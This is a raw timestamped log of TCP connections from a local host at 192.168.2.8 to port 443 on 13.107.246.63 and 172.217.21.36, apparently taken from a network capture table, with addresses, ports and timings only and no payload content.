                                                                                                                                                                                                        Dec 2, 2024 07:39:07.189735889 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.189779997 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.189857960 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.190023899 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.190038919 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.648755074 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.649315119 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.649326086 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.649826050 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.649830103 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.733592987 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.734103918 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.734132051 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.734601974 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.734608889 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.783838987 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.784343958 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.784357071 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.784815073 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.784820080 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.964181900 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.965034962 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.965049982 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.965543985 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.965549946 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083198071 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083267927 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083386898 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083662033 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083681107 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083689928 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.083702087 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.087152004 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.087202072 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.087282896 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.087505102 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.087518930 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.188925982 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189003944 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189243078 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189623117 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189645052 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189656019 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.189661980 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.193289042 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.193322897 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.193424940 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.193562031 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.193576097 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228071928 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228138924 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228224039 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228526115 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228543043 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228557110 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.228563070 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.232232094 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.232273102 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.232367992 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.232557058 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.232567072 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412230015 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412333965 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412498951 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412818909 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412818909 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412857056 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.412870884 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.416301012 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.416346073 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.416450024 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.416610956 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.416625023 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.905874968 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.911062002 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.911082983 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.911552906 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.911556959 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.341037035 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.341104031 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.341228962 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.353188038 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.353205919 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.353223085 CET49881443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.353228092 CET4434988113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.359503031 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.359543085 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.359603882 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.359998941 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.360013008 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.932061911 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.932615995 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.932636976 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.933231115 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.933238029 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.974509954 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.975107908 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.975136995 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.975673914 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:09.975681067 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.012233973 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.012830973 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.012850046 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.013417006 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.013421059 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.197223902 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.197894096 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.197926044 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.198389053 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.198394060 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.387233019 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.387307882 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.387365103 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.388281107 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.388292074 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.388303995 CET49882443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.388310909 CET4434988213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.391894102 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.391936064 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.391997099 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.392241001 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.392255068 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419624090 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419699907 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419785023 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419939041 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419956923 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419970036 CET49883443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.419975042 CET4434988313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.422802925 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.422841072 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.422945976 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.423127890 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.423141956 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.462896109 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.462963104 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.463083982 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.463306904 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.463325977 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.463337898 CET49884443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.463344097 CET4434988413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.466269970 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.466309071 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.466387033 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.466555119 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.466572046 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.643508911 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.643589973 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.643729925 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.647181988 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.647196054 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.647226095 CET49885443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.647231102 CET4434988513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.650470018 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.650501966 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.650603056 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.651213884 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.651223898 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.888098001 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.888151884 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.888289928 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.888545990 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:10.888561010 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.207288027 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.208023071 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.208048105 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.208530903 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.208535910 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868383884 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868469954 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868539095 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868772984 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868791103 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868803024 CET49886443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.868808985 CET4434988613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.871804953 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.871836901 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.871943951 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.872106075 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:11.872122049 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.377717972 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.394820929 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.415493011 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.415523052 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.416002989 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.416008949 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.426002979 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.427392006 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.427423954 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.428230047 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.428234100 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.428754091 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.428770065 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.429183006 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.429188967 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.430860996 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.431989908 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.432003975 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.432537079 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.432542086 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.581614017 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.582061052 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.582073927 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.582432032 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.582986116 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.583059072 CET44349891172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.628351927 CET49891443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815347910 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815422058 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815527916 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815882921 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815906048 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815917969 CET49889443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.815929890 CET4434988913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.819478035 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.819518089 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.819603920 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.819756985 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.819773912 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.838756084 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.838849068 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.839086056 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.839126110 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.839126110 CET49887443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.839143038 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.839155912 CET4434988713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.842232943 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.842297077 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.842387915 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.842578888 CET49894443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.842598915 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.874679089 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.874748945 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.874820948 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.875122070 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.875137091 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.875149965 CET49890443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.875154972 CET4434989013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.878390074 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.878427029 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.878570080 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.878751993 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.878766060 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.879793882 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.879853010 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.879992008 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.880014896 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.880021095 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.880033016 CET49888443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.880036116 CET4434988813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.882196903 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.882230997 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.882308960 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.882431030 CET49896443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:12.882443905 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:13.657632113 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:13.658359051 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:13.658377886 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:13.658885002 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:13.658889055 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.104005098 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.104069948 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.104249001 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.110277891 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.110291004 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.110301971 CET49892443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.110307932 CET4434989213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.114074945 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.114099979 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.114193916 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.114331961 CET49897443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.114343882 CET4434989713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.534543991 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.535130024 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.535145998 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.536590099 CET49893443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.536596060 CET4434989313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.592946053 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.593485117 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.593498945 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.593997002 CET49895443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.594002962 CET4434989513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.661170959 CET4434989613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.686589956 CET4434989413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:14.711021900 CET49896443192.168.2.813.107.246.63
